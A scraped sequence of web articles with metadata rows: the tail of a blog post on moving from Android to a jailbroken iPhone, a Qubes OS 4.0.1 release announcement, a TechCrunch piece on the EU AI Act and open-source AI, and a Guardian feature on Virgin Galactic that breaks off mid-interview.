8. f.lux! It’s a godsend if you’ve ever used it on your Mac.
9. You can change control center toggles, as well as customize the entire CC and NC (add/remove sections, remove separator colors, etc…).
10. Access to the filesystem using any SFTP program or a file browser like iFile.
That’s a really well considered piece. Good writing. Good thinking.
Good post.
When I see your first post that you are avoiding iMessage, I think maybe not Mac user, but now I know. The whole Apple eco system works really well.
In major I use iPhone and I use Android for 2nd phone, major for testing.
Some Android maker makes good battery life, but not all. Also it’s kind of habit to close all Apps in Android to prevent those Apps is doing silly things to drain the battery.
I hope 2 system can compete each other so we can see more improvement. | true | true | true | I wrote perhaps my most popular blog post ever just over 2 months ago. I talked about how I bought, used, and subsequently didn’t like the iPhone 6. I would be sticking with Android…or so I thought. Shortly after that post got popular, I was compelled to take another look at iOS. There were 2 factors in my first trial with the... | 2024-10-12 00:00:00 | 2015-08-02 00:00:00 | article | casabona.org | Joe Casabona | null | null |
|
18,862,000 | https://www.qubes-os.org/news/2019/01/09/qubes-401/ | Qubes OS 4.0.1 has been released! | Marek Marczykowski-Górecki | # Qubes OS 4.0.1 has been released!
We’re pleased to announce the release of Qubes 4.0.1! This is the first stable patch release of Qubes 4.0. It includes many updates over the initial 4.0 release, in particular:
- All 4.0 dom0 updates to date, including a lot of bug fixes and improvements for GUI tools
- Fedora 29 TemplateVM
- Debian 9 TemplateVM
- Whonix 14 Gateway and Workstation TemplateVMs
- Linux kernel 4.14
Qubes 4.0.1 is available on the Downloads page.
## What is a patch release?
A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.0) inclusive of all updates up to a certain point. Installing Qubes 4.0 and fully updating it results in the same system as installing Qubes 4.0.1.
## What should I do?
If you’re currently using an up-to-date Qubes 4.0 installation (including updated Fedora 29, Debian 9, and Whonix 14 templates), then your system is already equivalent to a Qubes 4.0.1 installation. No action is needed.
Similarly, if you’re currently using a Qubes 4.0.1 release candidate (4.0.1-rc1 or 4.0.1-rc2), and you’ve followed the standard procedure for keeping it up-to-date, then your system is equivalent to a 4.0.1 stable installation, and no additional action is needed.
If you’re currently using Qubes 4.0 but don’t have these new templates installed yet, we recommend that you follow the appropriate documentation to do so:
Regardless of your current OS, if you wish to install (or reinstall) Qubes 4.0 for any reason, then the 4.0.1 ISO will make this more convenient and secure, since it bundles all Qubes 4.0 updates to date. It will be especially helpful for users whose hardware is too new to be compatible with the original Qubes 4.0 installer. | true | true | true | We’re pleased to announce the release of Qubes 4.0.1! This is the first stable patch release of Qubes 4.0. It includes many updates over the initial 4.0 release, in particular: All 4.0 dom0 updates to date, including a lot of bug fixes and improvements for GUI tools Fedora 29 TemplateVM... | 2024-10-12 00:00:00 | 2019-01-09 00:00:00 | article | qubes-os.org | Qubes OS | null | null |
|
32,747,436 | https://techcrunch.com/2022/09/06/the-eus-ai-act-could-have-a-chilling-effect-on-open-source-efforts-experts-warn/ | The EU's AI Act could have a chilling effect on open source efforts, experts warn | Kyle Wiggers | The nonpartisan think tank Brookings this week published a piece decrying the bloc’s regulation of open source AI, arguing it would create legal liability for general-purpose AI systems while simultaneously undermining their development. Under the EU’s draft AI Act, open source developers would have to adhere to guidelines for risk management, data governance, technical documentation and transparency, as well as standards of accuracy and cybersecurity.
If a company were to deploy an open source AI system that led to some disastrous outcome, the author asserts, it’s not inconceivable the company could attempt to deflect responsibility by suing the open source developers on which they built their product.
“This could further concentrate power over the future of AI in large technology companies and prevent research that is critical to the public’s understanding of AI,” Alex Engler, the analyst at Brookings who published the piece, wrote. “In the end, the [E.U.’s] attempt to regulate open-source could create a convoluted set of requirements that endangers open-source AI contributors, likely without improving use of general-purpose AI.”
In 2021, the European Commission — the EU’s politically independent executive arm — released the text of the AI Act, which aims to promote “trustworthy AI” deployment in the EU as they solicit input from industry ahead of a vote this fall, EU. institutions are seeking to make amendments to the regulations that attempt to balance innovation with accountability. But according to some experts, the AI Act as written would impose onerous requirements on open efforts to develop AI systems.
The legislation contains carve-outs for *some* categories of open source AI, like those exclusively used for research and with controls to prevent misuse. But as Engler notes, it’d be difficult — if not impossible — to prevent these projects from making their way into commercial systems, where they could be abused by malicious actors.
In a recent example, Stable Diffusion, an open source AI system that generates images from text prompts, was released with a license prohibiting certain types of content. But it quickly found an audience within communities that use such AI tools to create pornographic deepfakes of celebrities.
Oren Etzioni, the founding CEO of the Allen Institute for AI, agrees that the current draft of the AI Act is problematic. In an email interview with TechCrunch, Etzioni said that the burdens introduced by the rules could have a chilling effect on areas like the development of open text-generating systems, which he believes are enabling developers to “catch up” to Big Tech companies like Google and Meta.
“The road to regulation hell is paved with the EU’s good intentions,” Etzioni said. “Open source developers should not be subject to the same burden as those developing commercial software. It should always be the case that free software can be provided ‘as is’ — consider the case of a single student developing an AI capability; they cannot afford to comply with EU regulations and may be forced not to distribute their software, thereby having a chilling effect on academic progress and on reproducibility of scientific results.”
Instead of seeking to regulate AI technologies broadly, EU regulators should focus on specific applications of AI, Etzioni argues. “There is too much uncertainty and rapid change in AI for the slow-moving regulatory process to be effective,” he said. “Instead, AI applications such as autonomous vehicles, bots, or toys should be the subject of regulation.”
Not every practitioner believes the AI Act is in need of further amending. Mike Cook, an AI researcher who’s a part of the Knives and Paintbrushes collective, thinks it’s “perfectly fine” to regulate open source AI “a little more heavily” than needed. Setting any sort of standard can be a way to show leadership globally, he posits — hopefully encouraging others to follow suit.
“The fearmongering about ‘stifling innovation’ comes mostly from people who want to do away with all regulation and have free rein, and that’s generally not a view I put much stock into,” Cook said. “I think it’s okay to legislate in the name of a better world, rather than worrying about whether your neighbour is going to regulate less than you and somehow profit from it.”
To wit, as my colleague Natasha Lomas has previously noted, the EU’s risk-based approach lists several prohibited uses of AI (e.g. China-style state social credit scoring) while imposing restrictions on AI systems considered to be “high-risk” — like those having to do with law enforcement. If the regulations were to target product types as opposed to product categories (as Etzioni argues they should), it might require thousands of regulations — one for each product type — leading to conflict and even greater regulatory uncertainty.
An analysis written by Lilian Edwards, a law professor at the Newcastle School and a part-time legal advisor at the Ada Lovelace Institute, questions whether the providers of systems like open source large language models (e.g. GPT-3) might be liable after all under the AI Act. Language in the legislation puts the onus on downstream deployers to manage an AI system’s uses and impacts, she says — not necessarily the initial developer.
“[T]he way downstream deployers use [AI] and adapt it may be as significant as how it is originally built,” she writes. “The AI Act takes some notice of this but not nearly enough, and therefore fails to appropriately regulate the many actors who get involved in various ways ‘downstream’ in the AI supply chain.”
At AI startup Hugging Face, CEO Clément Delangue, counsel Carlos Muñoz Ferrandis and policy expert Irene Solaiman say that they welcome regulations to protect consumer safeguards, but that the AI Act as proposed is too vague. For instance, they say, it’s unclear whether the legislation would apply to the “pre-trained” machine learning models at the heart of AI-powered software or only to the software itself.
“This lack of clarity, coupled with the non-observance of ongoing community governance initiatives such as open and responsible AI licenses, might hinder upstream innovation at the very top of the AI value chain, which is a big focus for us at Hugging Face,” Delangue, Ferrandis and Solaiman said in a joint statement. “From a competition and innovation perspective, if you already place overly heavy burdens on openly released features at the top of the AI innovation stream you risk hindering incremental innovation, product differentiation and dynamic competition, this latter being core in emergent technology markets such as AI-related ones … The regulation should take into account the innovation dynamics of AI markets and thus clearly identify and protect core sources of innovation in these markets.”
As for Hugging Face, the company advocates for improved AI governance tools regardless of the AI Act’s final language, like “responsible” AI licenses and model cards that include information like the intended use of an AI system and how it works. Delangue, Ferrandis and Solaiman point out that responsible licensing is starting to become a common practice for major AI releases, such as Meta’s OPT-175 language model.
“Open innovation and responsible innovation in the AI realm are not mutually exclusive ends, but rather complementary ones,” Delangue, Ferrandis and Solaiman said. “The intersection between both should be a core target for ongoing regulatory efforts, as it is being right now for the AI community.”
That well may be achievable. Given the many moving parts involved in EU rulemaking (not to mention the stakeholders affected by it), it’ll likely be years before AI regulation in the bloc starts to take shape. | true | true | true | As written, the European Union's AI Act, which seeks to regulate certain types of AI systems, could impose onerous requirements on open source developers, some experts believe. | 2024-10-12 00:00:00 | 2022-09-06 00:00:00 | article | techcrunch.com | TechCrunch | null | null |
|
7,279,347 | http://www.theguardian.com/science/2014/feb/21/jon-ronson-virgin-galactic-richard-branson-future-atronauts | Jon Ronson is ready for blast-off. Is Richard Branson? | Jon Ronson | It’s dawn at the Mojave Air & Space Port, a cluster of weather-beaten hangars in the desert north of Los Angeles. It looks quite forlorn, in part an elephant’s graveyard for half-finished prototype jets designed by visionaries who ran out of money. But it’s also a gathering place for freewheeling, maverick space engineers to try out new ideas in the desert: the rocket world’s wild west.
A fleet of coaches pulls up outside a hangar. The passengers, coiffured and rich-looking, climb out. The men wear shirts with logos for places such as the Monte-Carlo Polo Club. The women wear the kind of leopard print blouses you see in fashion boutiques in five-star hotels. They are led inside the hangar and take their seats.
“Welcome to the world’s largest ever gathering of future astronauts,” says the man on the stage, Sir Richard Branson. “As part of our wonderful, pioneering future astronaut community, your place in history is assured.”
So far, nearly 700 people have paid either $200,000 or $250,000 (£125,000 or £155,000) for a two-hour trip into space inside the Virgin Galactic SpaceShipTwo, a trip that includes five minutes of weightlessness. (Virgin raised the price by $50,000 in May 2013 to adjust for inflation: some future astronauts paid their $200,000 as long ago as 2004, when tickets first went on sale and Branson predicted a 2007 launch. Tom Hanks has booked, along with Angelina Jolie and Princess Eugenie.) Four hundred of them are in Mojave today, for speeches, a cocktail party and to witness a test flight. This, unfortunately, has just been cancelled due to high winds. (It doesn’t feel that windy.)
I’m here because the pronouncement Branson just made from the stage is probably not an exaggeration. These men and women are standing on the edge of history – pioneers in the sort-of-democratisation of space travel. Only 530 humans have been into outer space, which is defined as 100km (62 miles) above sea level. Branson is talking about putting that many people up there in his first year of operation. And it’s about to happen, he says. It has been 23 years since he registered the name Virgin Galactic Airways, and 10 since they started building the spaceship – an enterprise stricken by delays and tragedy. Now they’re only months away. Branson says the first unmanned test flight will take place “soon”; he and his children will take the first commercial space flight later this year.
I am at a table towards the back of the hangar, listening to the speeches with future astronaut Trevor Beattie. He’s the working-class Birmingham boy who made his millions as an ad man – famous for Wonderbra’s Hello Boys posters, and French Connection’s FCUK campaign, as well as the 2001 and 2005 New Labour election campaigns for his friend Peter Mandelson.
“Some say Nasa sent the wrong people into space,” Trevor tells me quietly. “Nasa sent scientists and engineers. When they came back, they either got God or became poets. So what happens this time, when you send creative people? Do we come back as engineers and scientists? What will it do to the other side of our brains?”
“Maybe it’ll fuck you up,” I whisper back.
“I talked to someone who went on the Zero G,” Trevor replies. “He said that after he came back down, he found gravity a real drag.”
The Zero G is a specially modified plane that, for $4,950 per passenger, creates weightlessness by performing aerobatic manoeuvres known as parabolas. Branson has been recommending that all future astronauts take a flight on it in preparation for the real thing. Trevor will take his tomorrow, 30,000ft above Burbank, California. He promises to let me know if weightlessness is all it’s cracked up to be.
Now Virgin Galactic’s CEO, George Whitesides, is on the stage. He surveys the room. “You are truly,” he says, “the first in a new class of citizen explorer.”
In the mid-80s, the then Soviet president Mikhail Gorbachev invited Branson to be the first civilian in space. He asked Gorbachev’s people how much it would cost – $50m, they said, “plus I’d need to spend two years training in Russia, which was too much of my time,” Branson tells me. “And I thought it wouldn’t look quite right somehow. Then I thought, wouldn’t it be better to spend that $50m building a spaceship company instead?”
We’re sitting in a small meeting room behind the Virgin hangar at the Mojave Air & Space Port. All this is a first for Branson. He’s never created an industry from scratch before. His other endeavours have been about sprucing up existing worlds: credit cards, record labels. Not many people go from putting out the Sex Pistols to creating a new dawn for humanity. As Whitesides will later tell me, “This is the start of something really big – humanity going into the cosmos. Nasa’s gone. The Russians have gone. But this is the start of the rest of us going. I really think there is a power in this moment in time in history.”
So how did Branson persuade himself he could do it? “At the time we put out the Sex Pistols, people thought we were taking a giant risk,” he says. “Then the train network. Each of these was a building block that gave me the confidence to dream even bigger. When I started Virgin Atlantic, I knew nothing about running airlines. I just felt somebody should be able to do it better than British Airways. By then I’d learned what a company is. A company is, you go and find the best people. We got the chief technical officer from British Caledonian, so we knew it was going to be safe, then we got a lot of creative people who weren’t from the airline world to go and shake up the business. Starting a spaceship company is not that dissimilar.”
The first 10 years were, he says, a fruitless trek around the world, visiting garages in the middle of nowhere to hear crazy pitches from father-and-son rocket design teams. “It was surprising how few of them really had credible, serious ideas,” he says. “The biggest worry I had was re-entry. Nasa has lost about 3% of everyone who’s gone into space, and re-entry has been their biggest problem. For a government-owned company, you can just about get away with losing 3% of your clients. For a private company you can’t really lose anybody. Nobody we met had anything but the conventional risky re-entry mechanism that Nasa had. We were waiting for someone to come up with one that was foolproof.”
He says those 10 years were frustrating, but when I ask if he ever lost his temper, he says, “Oh, I would find that very counterproductive. I was brought up by parents who, if I ever said a bad word about somebody, would send me to the mirror and make me look in it and tell me how badly it reflected on myself.” He pauses. “Anyway. Finally we met Burt Rutan.”
Burt Rutan is the reason for all this. If, in the coming months and years, we are all shooting up and down to outer space, we’ll have Rutan to thank. In photographs, he looks rugged and outdoorsy, with country-singer hair and big sideburns. He’s a legend in aerospace circles. In 1986, he built the first plane to fly around the world on a single tank of fuel. In the mid-90s, he set about trying to solve the re-entry problem.
Rutan, who is now 70, had an advantage over Nasa. If you’re coming back from Mars, you re-enter the Earth’s atmosphere at 12km a second. The heat and the friction at that speed can tear a machine apart. But coming back from a suborbital flight – which was the puzzle Rutan was trying to solve – the spaceship would be going a lot slower. But it would still need something to slow it down.
“Burt Rutan’s idea was to turn a spaceship into a giant shuttlecock,” Branson says. “And so the pilot could be sound asleep on re-entry and it didn’t matter what angle it hit coming back into the Earth’s atmosphere.”
Rutan didn’t go to Branson for funding. He went to Paul Allen, the co-founder of Microsoft. Allen was famous for lavishing money on space projects, such as the $30m he gave the Seti Institute (Search for Extraterrestrial Intelligence) to build an array of receivers to constantly listen out for signals from other planets, so far in vain. Allen gave Rutan $20m. Their aspiration, Branson says, was never more than academic. They would build a prototype – SpaceShipOne – fly it into space twice, and win the X Prize. This was a 2004 competition with a $10m prize for the first privately funded company to fly a reusable space ship into space twice. Then they’d retire SpaceShipOne to the Smithsonian, where it would end its days hanging from the ceiling. All of this did, indeed, happen. SpaceShipOne now hangs next to the Spirit of St Louis in the Smithsonian’s Milestones of Flight gallery in Washington DC.
“And that was to be the end of it,” Branson says. “Paul Allen is someone who loves to see what’s possible, but he’s not that interested in running a commercial business. So I went to see him at his house in Holland Park. I told him I thought he was missing a trick, and we would love to take it forward. So we bought the technology off him. We managed to get a group of engineers together and we started to build SpaceShipTwo.”
SpaceShipOne had been filled with “single point failures”. “If one bolt falls off and you die, that’s a single point of failure,” the Virgin Galactic engineer, Matt Stinemetze, told Wired magazine in March 2013. “There were things that you probably would’ve done differently if you’re going to carry Angelina Jolie.”
For SpaceShipTwo, Rutan’s engineers had to turn the prototype into something that could go to space “100 times, maybe 1,000 times”, Branson tells me. Developing the rocket motor has been the hardest challenge, followed by modifying the electric actuator – the mechanism that enables the pilot to move the stabiliser, the big part of the tail. SpaceShipOne had one. For SpaceShipTwo they built two in series, so one can fail and it will still work.
Every addition to the prototype needed to be as light as possible – any superfluous weight will eat into the already meagre weightless minutes. Within this constraint, they had to decide how many passengers to take. They settled on six and two pilots, and built a ship 1.6 times bigger than the original.
In 2004, even though they were still – they thought – three years from launching people into space, Virgin opened a reservations website. It crashed under the weight of interest. The first people to pay their deposits included George Whitesides, who back then was chief of staff for Nasa, Trevor Beattie and the Dallas actor Victoria Principal. The Virgin Galactic designers polled these early future astronauts. What did they want out of the experience? They wanted to see Earth from space. They wanted a really good view. So Virgin put in lots of windows. For the interior design they appointed Adam Wells, the man who invented the Virgin Atlantic flat bed and the purple mood-lit Virgin America cabin. He went for white and silver – colours that would “not draw attention to themselves and instead get out of the way of the incredible things happening outside the window”.
Wells is telling me this by phone a few weeks later. He doesn’t sound too happy about the white and the silver. “Longer term, I have ideas about how that might evolve,” he says. “But we need to get up to space to see how those colours perform, what sort of behaviours people have with them.”
There won’t be much fabric on board, Wells adds, fabric being an unnecessary weight, and definitely no leather. “Leather would be a temptation for a high-end product, but it would be an odd thing to line the interior of your state-of-the-art spacecraft with a fellow earthling’s skin.” He pauses. “We think about this stuff a lot – about what’s right and wrong.”
Then he adds that everything he’s telling me is “all under wraps”.
“These are scoops?” I ask.
“Yeah,” he says. “This is good info.”
SpaceShipTwo won’t have a flight attendant – there will be no drinks service or anything like that – and no toilet. Every passenger will be invited to wear a special astronaut nappy, or maximum absorbency garment, under his or her flight suit, which hasn’t yet been designed.
“I met your sister Vanessa once,” I tell Branson. “She told me you’re psychologically different in some way. Like you have a restlessness – an itch that constantly needs scratching. Are you psychologically different in some way?”
He shifts in his chair. “I think that’s possible,” he replies. “I will feel guilty if I’m not trying to achieve something.”
“So if a day passes when nothing’s been achieved, do you see that as a bad day?” I ask.
“Definitely,” he says. “Yeah. We weren’t allowed to watch television as kids. We were told we had to be climbing trees or creating things. I’m sure that if I found myself watching television, I’d feel slightly uncomfortable.”
“How long do you have to not achieve something before you start feeling guilty?” I ask. “An hour?”
“Oh, it’s not very long,” he says.
He glances at a painting on the wall of SpaceShipTwo in an attempt, I suspect, psychically to will me to remember what I’m supposed to be interviewing him about.
“Well, your psychological distress is for the benefit of others,” I finish, “because you’ve really made my life better, especially with Virgin Atlantic and Virgin America.”
“Fantastic,” he whistles. “For a Guardian journalist to say that, particularly, thank you.”
When our interview is over, I drive out of the Mojave Space Port towards Los Angeles. I pass the spot where, on a boiling hot afternoon – 26 July 2007 – Rutan’s team was testing rocket propellant for Virgin Galactic when a tank of nitrous oxide exploded. There had been 17 people watching the test out here in the desert, this place for maverick engineers to push the boundaries. Shards of carbon fibre shot into them. Three of Rutan’s engineers were killed, and three others seriously injured.
“It turned Burt Rutan from a young man into an old man overnight,” Branson told me. “He’d never lost anybody in his life.”
Rutan’s company was found liable and fined $25,870. As the science writer Jeff Hecht wrote in New Scientist, “The company has an enviable reputation for creativity, but the report suggests it did not have an obsession with training, rules and written procedures… a dangerous combination when working with rocket fuels.”
Rutan quit the business in 2011. He retired to the lakes of Coeur d’Alene, Idaho, a climate about as far from Mojave as is possible to find. He didn’t respond to my emails asking for an interview.
When I asked Branson how personally connected he felt to the three deaths, he said, “Well…” Then he stopped. “If they were working directly for me, I would feel very responsible. Obviously, if we hadn’t decided to do the programme in the first place, they would be alive today. So you realise that. But talking to relatives and survivors – I think every one of the survivors came back to work with the rocket company afterwards. Everybody had to pick themselves up and move forwards, and everybody did.”
Paris Hilton is a future astronaut. So are Justin Bieber and Lady Gaga. Of course, regular aviation began this way, too, with the elite putting down the big money first. Ashton Kutcher is another future astronaut, as is Vasily Klyukin. He’s a 37-year-old property developer and skyscraper designer from Russia. His ticket cost him just over £1m. He outbid everyone at an auction in support of Aids research at last year’s Cannes film festival. The prize was a trip into space with a mystery companion, who turned out to be Leonardo DiCaprio.
“My desire was to win!” Klyukin emails me. “I am a man, and men had to win. Space is the Olympic gold medal in the ‘Adventures’ nomination and cannot be conquered by everyone.” He adds that he was swept up in the glamour of the night, too – the auction was full of Victoria’s Secret angels. But he has no regrets, no buyer’s remorse. In fact, as a surprise for Branson, he’s designed a Virgin Galactic-shaped skyscraper. He emails me a mock-up of how it would look next to the Gherkin in central London.
Then he unexpectedly invites me on a two-week transatlantic voyage on board his friend’s 228ft super-yacht, the Sherakhan: “Very rare invitation! It would be two incredible weeks. Usually it costs a lot, about €1m [£850,000].” I consider his offer for a long time, but eventually decline, because frankly two weeks is a long time to be in the middle of the Atlantic with a Russian billionaire I don’t know, and I think it would get awkward.
A week passes. I telephone Trevor Beattie to ask how his zero-gravity flight went.
“Um…” he replies. “OK. Where do I start? So. Being on the Zero G is like being flown in a hollowed-out Boeing over a hump. You float around uncontrollably for 30 seconds. Everyone does their swimming action, but it does no good. Then they shout an order: ‘FEET DOWN! FEET DOWN!’ That tells you you’ve got three seconds before the gravity comes back on and you splat back to the floor again. You try and get in a vertical position, so when the gravity comes on, you hit the deck ready for the next parabola. Which I very sensibly did.” Trevor coughs. “Except, when I looked up, there was a bloke about two and a half times my bodyweight who was still floating 10ft above me at zero gravity. Then I realised I was in some kind of Wile E Coyote cartoon. There wasn’t much I could do about it. The gravity came on and he came down like a fucking ton of bricks.”
“Oh my God,” I say.
“I tried to pull everything out of the way,” Trevor says. “The only thing I couldn’t extract was the end of my left foot, so I ended up with a fractured toe.”
“Bloody hell,” I say.
“Anyway,” Trevor continues, “I didn’t want to abort the flight, so I lumbered on. We did a few more parabolas. Then we came back. I had to get a taxi straight across town to LAX, so by the time the adrenaline wore off and I was on a 10-hour flight to London, I was a bit of a mess.”
“This is hilarious,” I say.
“The doctors thought so, too,” Trevor says.
It’s two weeks later. I’m sitting with Richard Branson in a hotel room in Washington DC. He is in town for a conference about the war on drugs. I’m here because my time with him in Mojave was short and there were many things I didn’t have time to ask. Particularly, what will space travel on Virgin Galactic actually feel like? I can’t picture it.
“Well, it’s all in our imagination at the moment,” Branson says.
Then he tries to explain.
It will all begin in the deserts of New Mexico, inside a spaceport, Spaceport America, designed by Norman Foster. The building is already finished (although the interiors are still to be done). The photographs make it look incredible – vast but almost invisible, as if it’s growing out of the horizon, the same rust colour as the sand around it and the mountains beyond. It cost $212m – paid for by New Mexico taxpayers – and was built so far out in the middle of nowhere that they had to construct 16km of road just to connect it to the nearest tarmac.
Later, Virgin Galactic’s Whitesides will describe the spaceport to me over the phone as “a welcoming cradle for this band of explorers, something sleek in the sense of 2001: A Space Odyssey, but friendly in the sense of the Virgin Heathrow lounge. People will see it and think, ‘Yes, this is the place I should be flying to space from. This is appropriate.’”
Future astronauts will spend three days at the Spaceport for safety training and to pre-acclimatise themselves to the “sights and sounds” of space travel. “So you’re not going to be doing everything for the first time on the flight,” Adam Wells says. There’ll be a simulator to reproduce the various thumps and bangs, “so when you hear some sort of clunking sound, you’ll know it’s because the landing gear has just gone up or down.” Without all this, Wells says, there’ll be “a real risk of sensory overload on the flight. You’ll be bombarded with so much that’s new to you, your memory won’t be able to log it and fix it in place.” And you’ll come back to Earth remembering nothing much.
Also, during those three days, Wells’s people will take your measurements, because “we’re effectively rebuilding the seat for each customer”. This is for the G-force part of the trip. It’s much less unpleasant if the Gs are concentrated in your chest, so the personalised seat configuration will help with that. And then, on day three, you’ll climb into SpaceShipTwo.
You will begin its flight attached to a plane with two fuselages – WhiteKnightTwo. It will feel like a normal takeoff and a normal flight until you reach 50,000ft. “At 50,000ft the sky is a much deeper blue,” Whitesides tells me. “The vast majority of humanity hasn’t been to 50,000ft. Anyway, you get up to 50,000ft and then you have the release and you’ll feel a sense of instantaneous weightlessness as the vehicle drops away. That’ll last a couple of seconds. And then the pilot turns the vehicle upwards and launches the rocket motor.”
“Suddenly, then,” Branson says, “you’re going from zero to 2,500mph in eight seconds. That’s going to be a rush you’ll never experience again in your life. You’ll go from tremendous noise, you’ll feel it through your body, and then the absolute beauty comes when the motor cuts and it’s just this total… silence.”
“The instant that the rocket motor shuts off, literally everything inside the cabin becomes weightless,” Whitesides says. “You’re still going up at a tremendous velocity, but once that motor is off, the pilot will initiate the space phase of the mission. He’ll tell people that they’re able to get out of their seats and float around the cabin.”
“The seating system reconfigures itself,” Wells says, “so you don’t have to think about putting the seat in the right position. It’s going to do it itself. The customers’ time is incredibly valuable while on this flight, and the last thing we want to do is burden you with responsibilities to move things around or to remember something or to handle something that would be tricky in any way. We want it to be completely intuitive.”
“There are plenty of windows and plenty of room,” Branson says, “and you just levitate out of your seat and float around and look back on Earth and you’ll be one of only 500 people who have ever been into space.”
“You’ll reach the point of maximum altitude and start to come back down,” Whitesides says, “like a ball being thrown up with one hand and caught with the other hand. Once you get closer – perhaps 30 seconds from atmospheric re-entry – you’ll get above your seat and gently sink back down and put your seatbelt back on. And you’ll get ready for re-entry.” And then, as the Virgin Galactic website promises: “Later that evening, sitting with your astronaut wings, you know that life will never quite be the same again.”
“So Trevor Beattie went on the Zero G flight the other day and a man was floating above him and then the gravity came back on and he fell on him,” I tell Branson.
“A man fell on Trevor Beattie?” he says.
“He broke his foot,” I say.
“Trevor did?” Branson says.
I nod.
“Oh dear,” Branson says.
“Doesn’t Trevor Beattie’s broken toe show the dangers of what happens when the gravity comes back on?” I say.
He frowns at me. “We’ll give you warning and make sure you don’t get a broken toe,” he replies. “Buzz Aldrin told me, ‘Just enjoy space. Don’t do the Zero G. With the Zero G, they put you through 15 parabolas. In space, you’ve just got one beautiful parabola.’”
One month later, I am about to become weightless in a hollowed-out Zero G plane in the air above Fort Lauderdale, Florida. There are no Virgin Galactic future astronauts on this flight. Instead, there are 20 or so honeymooners, retirees, vacationers. We lie on padded mats on the plane’s floor, waiting for the weightlessness to start. When it does, it is at first bewildering. You suddenly levitate, as if you’re in a magic trick. You’re Sandra Bullock in Gravity, except instead of debris crashing into you, it’s tourists from New Zealand and Brazil. There is chaos and injury potential. At the back are rows of airline seats. If you don’t quickly learn to control your movements while you’re weightless, you might drift over them and plummet when the gravity comes back on. We land on the mat with a very big splat.
Each parabola lasts 30 seconds. There are 15 in all – apparently the optimum number before people start to vomit (Nasa puts its trainee astronauts through something like 60 parabolas and violent retching is the norm). By the third parabola, you realise you are no longer bewildered. You can handle it. And that’s when you become magnificent.
As I somersault, I remember something a Virgin Galactic future astronaut told me over the telephone last week. His name is Yanik Silver and his company, Maverick Business Adventures, organises adrenaline holidays for “exclusive” clients. The introductory video on its website makes it clear that you probably shouldn’t put your name forward for one of Yanik’s trips because he’s very selective and you’re “probably not right”. It’s solely for “entrepreneurs or CEOs or business owners who live life to the fullest and want to create incredible breakthroughs in their business… If you’re a top-gun entrepreneur, there’s not that many people who will understand you, and who better to go on those incredible adventures where success and high-achieving is the norm, instead of people secretly wishing you would fail?”
I think Yanik is in some ways a quintessential Virgin Galactic future astronaut. Back in Mojave, another CEO had told me that he considered being a space adventurer and being an entrepreneur to be much the same thing – with both, you need to leap fearlessly into the unknown, demonstrating a courage that others lack (although when I repeated that to Beattie, he laughed and said, “How self-important!”). Yanik takes his specially selected CEOs scuba diving between the tectonic plates in Iceland, and high-speed evasive driving, and on Zero G flights. He told me something miraculous happens to a business brain during those pumped moments: “You get new ideas, new pathways in your thinking.” I asked him at what point the new ideas present themselves. Is it while you’re plummeting to the ground before the parachute opens? He said no, it’s usually back in the hotel bar later that night. Perhaps Yanik is right. Maybe I will get a new idea at some point later today. I am, after all, lost in the moment, which is rare for me. But then something unfortunate happens.
The Zero G on-board photographer beckons me to float towards him and the instant I concentrate on the manoeuvre the nausea begins. It is a cold, wet, overwhelming, hellish nausea. And it only gets worse with each subsequent parabola. The Zero G people would call this a successful flight, because no actual vomiting occurs. But I don’t consider myself a Zero G success story. As I float in a clammy sweat and watch my fellow weightless people joyfully catch droplets of water in their mouths, I suddenly remember how – many years ago – a man had told me he’d taken part in group sex.
“What was it *like*?” I’d asked him.
He frowned. “Honestly,” he said, “it’s better to watch than to actually do.” There are a lot of awkward physical realities involved, he explained. It’s best to spare yourself and just spectate.
Will commercial space travel really be as safe and awesome as Branson says? Who’d have the experience to answer these questions without any of the vested interests? An astronaut. A non-aligned astronaut. So I telephone Chris Hadfield.
Hadfield is the Canadian astronaut who became famous for posting a video of himself singing Space Oddity during his five weightless months on board the International Space Station. I describe my Zero G experience to him. Is that what real space is like?
“Oh no,” he says. “On the Zero G, you’re weightless and then squished, and weightless and then squished. It’s nauseating because it’s cyclic. You said yourself that the first few parabolas were fine.” Prolonged weightlessness, he says, “is just magic. You had it for 30 seconds and it’s not very good weightlessness. The pilots do their best, but you still occasionally bang people off the ceiling, and it’s still very short. To have it last for ever is so much fun. It’s such a joy. So delight-filled. And then you look out the window and the whole world is pouring by at eight kilometers a second. So you’ve got the grace of weightlessness and the gorgeousness and richness of looking at the world. I loved every second of it.”
“And the splatting?” I say. “Will there be lots of future astronauts with broken toes?”
“Oh, it’ll be nothing like that,” he says. “It’ll be much more gradual. The upper edges of the atmosphere are very wispy. You will have seen the worst case on the Zero G from a nausea and a transition point of view.”
I tell him how Branson had described Rutan’s shuttlecock mechanism as “foolproof”, and said that the pilot could be “sound asleep on re-entry and it didn’t matter”.
There’s a short silence. “Hmm,” he says, sounding doubtful. “He’s right – it *is *a simple, rugged mechanism that is reusable. It’s a nice, elegant solution. It’s a good design. But it’s not risk-free, and it’s complex. They’re working very hard – they’ve got experienced engineers and pilots to make it as safe as possible. But to come into any programme with any vehicle and think you’re somehow immune from what everybody else has always experienced with every machine in history is unrealistic. They don’t know everything yet. They still have a lot to learn. If they fly it 100 times, maybe they can be careful and judicious enough to avoid a crash. If they fly it forever, eventually one of them will crash. That’s just statistics. It could well be something that nobody anticipated. That’s normally how it happens with complex machines.” He pauses. “I’m just being realistic.”
I ask if he thinks the future astronauts will enjoy their experience.
“They’ll go very, very fast,” he replies. “That’ll be really thrilling. They’ll see directly with their own eyes something that very few human beings have seen: what the world looks like from above the atmosphere. But if they think they’re going to see the stars whipping by, or they’ll be going around the world several times, then they’re incorrect. And they’re going to be disappointed.” He pauses. “I went around the world something like 2,500 times. I saw thousands of sunrises and sunsets and all of the continents. Whereas this vehicle will go straight up and straight down again. That doesn’t belittle anything. They’ll get some of the same views. But it’s a different experience.”
I think Hadfield is concerned he is maybe sounding too sniffy, because now he says, “Richard Branson and his team are being very brave. Both financially and from an exploration point of view, they’re trying to do something nobody has done before. This is brand new.” He says that as long as the future astronauts manage their expectations, as long as they “plan for it, ask themselves, ‘What am I going to do with my minutes of weightlessness?’ so they don’t come down and say, ‘Huh. That’s not what I was expecting’, they’re going to love what’s happening.”
Two weeks later I receive an email I hadn’t expected at all: “I am in Buenos Aires on vacation. I will be at home in Idaho on Saturday and happy to talk to you after that.”
It is Burt Rutan.
I call him the day his cruise docks – this semi-reclusive engineering genius. I say that future generations might regard him as the Brunel of democratised space travel; does he think about things like that?
“Only since my retirement…” he says. He’s got a rich, deep American-South voice. Then he tells me why all this began for him.
